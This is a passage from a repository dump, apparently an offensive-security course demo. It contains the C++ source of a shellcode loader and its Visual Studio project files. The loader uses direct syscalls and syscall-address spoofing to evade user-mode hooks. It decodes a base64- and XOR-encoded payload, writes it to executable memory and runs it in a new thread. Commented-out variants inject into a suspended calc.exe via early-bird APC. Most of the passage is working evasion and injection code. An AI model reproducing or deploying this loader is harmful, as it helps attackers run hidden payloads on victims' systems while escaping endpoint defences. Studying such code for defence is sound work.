{\r\n\t\tVirtualQueryEx(\r\n\t\t\thProc,\r\n\t\t\tbase,\r\n\t\t\t&mbi,\r\n\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t);\r\n\r\n\t\tif (MEM_FREE == mbi.State) {\r\n\t\t\tuint64_t i;\r\n\t\t\tfor (i = 0; i < cVmResv; ++i) 
{\r\n\t\t\t\tLPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));\r\n\t\t\t\tVirtualQueryEx(\r\n\t\t\t\t\thProc,\r\n\t\t\t\t\tcurrentBase,\r\n\t\t\t\t\t&mbi,\r\n\t\t\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t\t\t);\r\n\t\t\t\tif (MEM_FREE != mbi.State)\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif (i == cVmResv) {\r\n\t\t\t\t// found suitable base\r\n\t\t\t\treturn base;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn nullptr;\r\n}\r\n\r\n#ifdef _M_IX86\r\n\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {\r\n\treturn (PVOID)__readfsdword(0xC0);\r\n}\r\n\r\n__declspec(naked) BOOL local_is_wow64(void)\r\n{\r\n\t__asm {\r\n\t\tmov eax, fs: [0xc0]\r\n\t\ttest eax, eax\r\n\t\tjne wow64\r\n\t\tmov eax, 0\r\n\t\tret\r\n\t\twow64 :\r\n\t\tmov eax, 1\r\n\t\t\tret\r\n\t}\r\n}\r\n\r\n\r\n#endif\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams\r\n\r\nSW3_SYSCALL_LIST SW3_SyscallList;\r\n\r\n// SEARCH_AND_REPLACE\r\n#ifdef SEARCH_AND_REPLACE\r\n// THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release\r\nEXTERN void SearchAndReplace(unsigned char[], unsigned char[]);\r\n#endif\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName)\r\n{\r\n\tDWORD i = 0;\r\n\tDWORD Hash = SW3_SEED;\r\n\r\n\twhile (FunctionName[i])\r\n\t{\r\n\t\tWORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);\r\n\t\tHash ^= PartialName + SW3_ROR8(Hash);\r\n\t}\r\n\r\n\treturn Hash;\r\n}\r\n\r\n#ifndef JUMPER\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n\treturn NULL;\r\n}\r\n#else\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n\tDWORD searchLimit = 512;\r\n\tPVOID SyscallAddress;\r\n\r\n#ifdef _WIN64\r\n\t// If the process is 64-bit on a 64-bit OS, we need to search for syscall\r\n\tBYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };\r\n\tULONG distance_to_syscall = 0x12;\r\n#else\r\n\t// If the process is 32-bit on a 32-bit OS, 
we need to search for sysenter\r\n\tBYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };\r\n\tULONG distance_to_syscall = 0x0f;\r\n#endif\r\n\r\n#ifdef _M_IX86\r\n\t// If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved\r\n\tif (local_is_wow64())\r\n\t{\r\n#ifdef DEBUG\r\n\t\tprintf(\"[+] Running 32-bit app on x64 (WOW64)\\n\");\r\n#endif\r\n\t\treturn NULL;\r\n\t}\r\n#endif\r\n\r\n\t// we don't really care if there is a 'jmp' between\r\n\t// NtApiAddress and the 'syscall; ret' instructions\r\n\tSyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);\r\n\r\n\tif (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n\t{\r\n\t\t// we can use the original code for this system call :)\r\n#if defined(DEBUG)\r\n\t\tprintf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n\t\treturn SyscallAddress;\r\n\t}\r\n\r\n\t// the 'syscall; ret' intructions have not been found,\r\n\t// we will try to use one near it, similarly to HalosGate\r\n\r\n\tfor (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)\r\n\t{\r\n\t\t// let's try with an Nt* API below our syscall\r\n\t\tSyscallAddress = SW3_RVA2VA(\r\n\t\t\tPVOID,\r\n\t\t\tNtApiAddress,\r\n\t\t\tdistance_to_syscall + num_jumps * 0x20);\r\n\t\tif (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n\t\t{\r\n#if defined(DEBUG)\r\n\t\t\tprintf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n\t\t\treturn SyscallAddress;\r\n\t\t}\r\n\r\n\t\t// let's try with an Nt* API above our syscall\r\n\t\tSyscallAddress = SW3_RVA2VA(\r\n\t\t\tPVOID,\r\n\t\t\tNtApiAddress,\r\n\t\t\tdistance_to_syscall - num_jumps * 0x20);\r\n\t\tif (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n\t\t{\r\n#if defined(DEBUG)\r\n\t\t\tprintf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n\t\t\treturn SyscallAddress;\r\n\t\t}\r\n\t}\r\n\r\n#ifdef DEBUG\r\n\tprintf(\"Syscall Opcodes not 
found!\\n\");\r\n#endif\r\n\r\n\treturn NULL;\r\n}\r\n#endif\r\n\r\n\r\nBOOL SW3_PopulateSyscallList()\r\n{\r\n\t// Return early if the list is already populated.\r\n\tif (SW3_SyscallList.Count) return TRUE;\r\n\r\n#ifdef _WIN64\r\n\tPSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);\r\n#else\r\n\tPSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);\r\n#endif\r\n\tPSW3_PEB_LDR_DATA Ldr = Peb->Ldr;\r\n\tPIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;\r\n\tPVOID DllBase = NULL;\r\n\r\n\t// Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second\r\n\t// in the list, so it's safer to loop through the full list and find it.\r\n\tPSW3_LDR_DATA_TABLE_ENTRY LdrEntry;\r\n\tfor (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])\r\n\t{\r\n\t\tDllBase = LdrEntry->DllBase;\r\n\t\tPIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;\r\n\t\tPIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);\r\n\t\tPIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;\r\n\t\tDWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\r\n\t\tif (VirtualAddress == 0) continue;\r\n\r\n\t\tExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);\r\n\r\n\t\t// If this is NTDLL.dll, exit loop.\r\n\t\tPCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);\r\n\r\n\t\tif ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;\r\n\t\tif ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;\r\n\t}\r\n\r\n\tif (!ExportDirectory) return FALSE;\r\n\r\n\tDWORD NumberOfNames = ExportDirectory->NumberOfNames;\r\n\tPDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);\r\n\tPDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);\r\n\tPWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, 
ExportDirectory->AddressOfNameOrdinals);\r\n\r\n\t// Populate SW3_SyscallList with unsorted Zw* entries.\r\n\tDWORD i = 0;\r\n\tPSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;\r\n\tdo\r\n\t{\r\n\t\tPCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);\r\n\r\n\t\t// Is this a system call?\r\n\t\tif (*(USHORT*)FunctionName == 0x775a)\r\n\t\t{\r\n\t\t\tEntries[i].Hash = SW3_HashSyscall(FunctionName);\r\n\t\t\tEntries[i].Address = Functions[Ordinals[NumberOfNames - 1]];\r\n\t\t\tEntries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));\r\n\r\n\t\t\ti++;\r\n\t\t\tif (i == SW3_MAX_ENTRIES) break;\r\n\t\t}\r\n\t} while (--NumberOfNames);\r\n\r\n\t// Save total number of system calls found.\r\n\tSW3_SyscallList.Count = i;\r\n\r\n\t// Sort the list by address in ascending order.\r\n\tfor (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)\r\n\t{\r\n\t\tfor (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)\r\n\t\t{\r\n\t\t\tif (Entries[j].Address > Entries[j + 1].Address)\r\n\t\t\t{\r\n\t\t\t\t// Swap entries.\r\n\t\t\t\tSW3_SYSCALL_ENTRY TempEntry;\r\n\r\n\t\t\t\tTempEntry.Hash = Entries[j].Hash;\r\n\t\t\t\tTempEntry.Address = Entries[j].Address;\r\n\t\t\t\tTempEntry.SyscallAddress = Entries[j].SyscallAddress;\r\n\r\n\t\t\t\tEntries[j].Hash = Entries[j + 1].Hash;\r\n\t\t\t\tEntries[j].Address = Entries[j + 1].Address;\r\n\t\t\t\tEntries[j].SyscallAddress = Entries[j + 1].SyscallAddress;\r\n\r\n\t\t\t\tEntries[j + 1].Hash = TempEntry.Hash;\r\n\t\t\t\tEntries[j + 1].Address = TempEntry.Address;\r\n\t\t\t\tEntries[j + 1].SyscallAddress = TempEntry.SyscallAddress;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn TRUE;\r\n}\r\n\r\nEXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)\r\n{\r\n\t// Ensure SW3_SyscallList is populated.\r\n\tif (!SW3_PopulateSyscallList()) return -1;\r\n\r\n\tfor (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n\t{\r\n\t\tif (FunctionHash == 
SW3_SyscallList.Entries[i].Hash)\r\n\t\t{\r\n\t\t\treturn i;\r\n\t\t}\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)\r\n{\r\n\t// Ensure SW3_SyscallList is populated.\r\n\tif (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n\tfor (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n\t{\r\n\t\tif (FunctionHash == SW3_SyscallList.Entries[i].Hash)\r\n\t\t{\r\n\t\t\treturn SW3_SyscallList.Entries[i].SyscallAddress;\r\n\t\t}\r\n\t}\r\n\r\n\treturn NULL;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)\r\n{\r\n\t// Ensure SW3_SyscallList is populated.\r\n\tif (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n\tDWORD index = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n\r\n\twhile (FunctionHash == SW3_SyscallList.Entries[index].Hash) {\r\n\t\t// Spoofing the syscall return address\r\n\t\tindex = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n\t}\r\n\treturn SW3_SyscallList.Entries[index].SyscallAddress;\r\n}\r\n\r\n\r\n\r\nint main()\r\n{\r\n\tbool all_tests_passed = false;\r\n\r\n\tstd::string rest2_reference = \"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@@\";\r\n\r\n\tstd::string rest3_reference = replace(rest2_reference, \"@@\", \"==\");\r\n\r\n\tstd::string rest2_decoded = base64_decode(rest3_reference);\r\n\r\n\tconst char* S = rest2_decoded.c_str();\r\n\r\n\r\n\r\n\r\n\tHANDLE hProc = OpenProcess(\r\n\t\tPROCESS_ALL_ACCESS,\r\n\t\tFALSE,\r\n\t\t8696\r\n\t);\r\n\r\n\tSYSTEM_INFO sys_inf;\r\n\tGetSystemInfo(&sys_inf);\r\n\r\n\tDWORD page_size{ sys_inf.dwPageSize };\r\n\tDWORD alloc_gran{ sys_inf.dwAllocationGranularity };\r\n\r\n\tSIZE_T szVmResv{ alloc_gran };\r\n\tSIZE_T szVmCmm{ page_size };\r\n\tDWORD  cVmResv = (rest2_decoded.length() / szVmResv) + 1;\r\n\tDWORD  cVmCmm = szVmResv / szVmCmm;\r\n\r\n\tLPVOID vmBaseAddress = GetSuitableBaseAddress(\r\n\t\thProc,\r\n\t\tszVmCmm,\r\n\t\tszVmResv,\r\n\t\tcVmResv\r\n\t);\r\n\tLPVOID    currentVmBase{ vmBaseAddress };\r\n\tNTSTATUS  status{ 0 
};\r\n\tvector<LPVOID>  vcVmResv;\r\n\r\n\t// Reserve (not commit) cVmResv allocation-granularity sized regions starting at the\r\n\t// chosen base, through the direct NtAllocateVirtualMemory stub (BNtAVM from nt.asm).\r\n\tfor (DWORD i = 1; i <= cVmResv; ++i)\r\n\t{\r\n\r\n\t\tstatus = BNtAVM(\r\n\t\t\thProc,\r\n\t\t\t&currentVmBase,\r\n\t\t\tNULL,\r\n\t\t\t&szVmResv,\r\n\t\t\tMEM_RESERVE,\r\n\t\t\tPAGE_NOACCESS\r\n\t\t);\r\n\t\tif (STATUS_SUCCESS == status) {\r\n\t\t\tvcVmResv.push_back(currentVmBase);\r\n\t\t}\r\n\t\telse {\r\n\r\n\t\t\tstd::cout << \"AVM error\";\r\n\t\t}\r\n\t\tcurrentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);\r\n\t}\r\n\r\n\tconst size_t szPayload{ rest2_decoded.length() };\r\n\r\n\t// Recover the payload one page (szVmCmm bytes) at a time: base64 was undone above,\r\n\t// the per-byte XOR (the inverse of enc.py) is undone here.\r\n\tfor (DWORD i = 0; i < cVmResv; ++i)\r\n\t{\r\n\t\tunsigned char* sc = new unsigned char[szVmCmm];\r\n\t\tfor (SIZE_T j = 0; j < szVmCmm; j++) {\r\n\t\t\t// Stay inside the decoded buffer; zero-fill past its end instead of reading garbage.\r\n\t\t\tsize_t idx = szVmCmm * i + j;\r\n\t\t\tsc[j] = (idx < szPayload) ? (unsigned char)(S[idx] ^ XOR_KEY) : 0;\r\n\t\t}\r\n\r\n\t\t// Allocate one page (the size of sc), not cVmResv bytes, and copy only what sc holds.\r\n\t\tvoid* exec = VirtualAlloc(0, szVmCmm, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\tif (exec == nullptr) {\r\n\t\t\tdelete[] sc;\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t\tmemcpy(exec, sc, szVmCmm);\r\n\t\tdelete[] sc;\r\n\r\n\t\t//((void(*)())exec)();\r\n\r\n\t\t/*\r\n\t\tHANDLE hThread = CreateThread(\r\n\t\t\tNULL,\r\n\t\t\t0,\r\n\t\t\t(LPTHREAD_START_ROUTINE)exec,\r\n\t\t\tNULL,\r\n\t\t\t0,\r\n\t\t\tNULL);\r\n\t\tif (hThread == NULL)\r\n\t\t{\r\n\t\t\treturn 1;\r\n\t\t}\r\n\r\n\t\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\t\tCloseHandle(hThread);\r\n\t}*/\r\n\r\n\r\n\t/*\r\n\tCreateThread\r\n\r\n\tHANDLE hThread = CreateThread(\r\n\t\tNULL,\r\n\t\t0,\r\n\t\t(LPTHREAD_START_ROUTINE)exec,\r\n\t\tNULL,\r\n\t\t0,\r\n\t\tNULL);\r\n\tif (hThread == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\tCloseHandle(hThread);\r\n\t*/\r\n\r\n\r\n\t// early bird APC\r\n\t\t/*\r\n\t\tSIZE_T shellSize = 4096;\r\n\t\tSTARTUPINFOA si = { 0 };\r\n\t\tPROCESS_INFORMATION pi = { 0 };\r\n\r\n\t\tCreateProcessA(\"C:\\\\Windows\\\\System32\\\\calc.exe\", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\r\n\t\tHANDLE victimProcess = 
pi.hProcess;\r\n\t\tHANDLE threadHandle = pi.hThread;\r\n\r\n\t\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\r\n\t\tWriteProcessMemory(victimProcess, shellAddress, exec, shellSize, NULL);\r\n\t\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\t\tResumeThread(threadHandle);\r\n\t\t*/\r\n\r\n\r\n\t\t//((void(*)())exec)();\r\n\t\tHANDLE hThread{ nullptr };\r\n\t\tANtCTE(\r\n\t\t\t&hThread,\r\n\t\t\tTHREAD_ALL_ACCESS,\r\n\t\t\tNULL,\r\n\t\t\tGetCurrentProcess(),\r\n\t\t\t(LPTHREAD_START_ROUTINE)exec,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\tnullptr\r\n\t\t);\r\n\t\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\t}\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n//   1. Use the Solution Explorer window to add/manage files\r\n//   2. Use the Team Explorer window to connect to source control\r\n//   3. Use the Output window to see build output and other messages\r\n//   4. Use the Error List window to view errors\r\n//   5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n//   6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n"
  },
  {
    "path": "chapter4-demo3/demo1/demo1.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <RootNamespace>demo1</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.props\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  
<ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      
<ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"base64.cpp\" 
/>\r\n    <ClCompile Include=\"demo1.cpp\" />\r\n    <MASM Include=\"nt.asm\">\r\n      <FileType>CppCode</FileType>\r\n    </MASM>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"base64.h\" />\r\n    <ClInclude Include=\"Header.h\" />\r\n    <ClInclude Include=\"nt.h\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.targets\" />\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo3/demo1/demo1.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\\Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"demo1.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"base64.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"Header.h\">\r\n      <Filter>Resource Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"base64.h\">\r\n      <Filter>Resource Files\\Header Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"nt.h\">\r\n      <Filter>Resource Files\\Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"nt.asm\">\r\n      <Filter>Source Files</Filter>\r\n    </MASM>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo3/demo1/demo1.vcxproj.user",
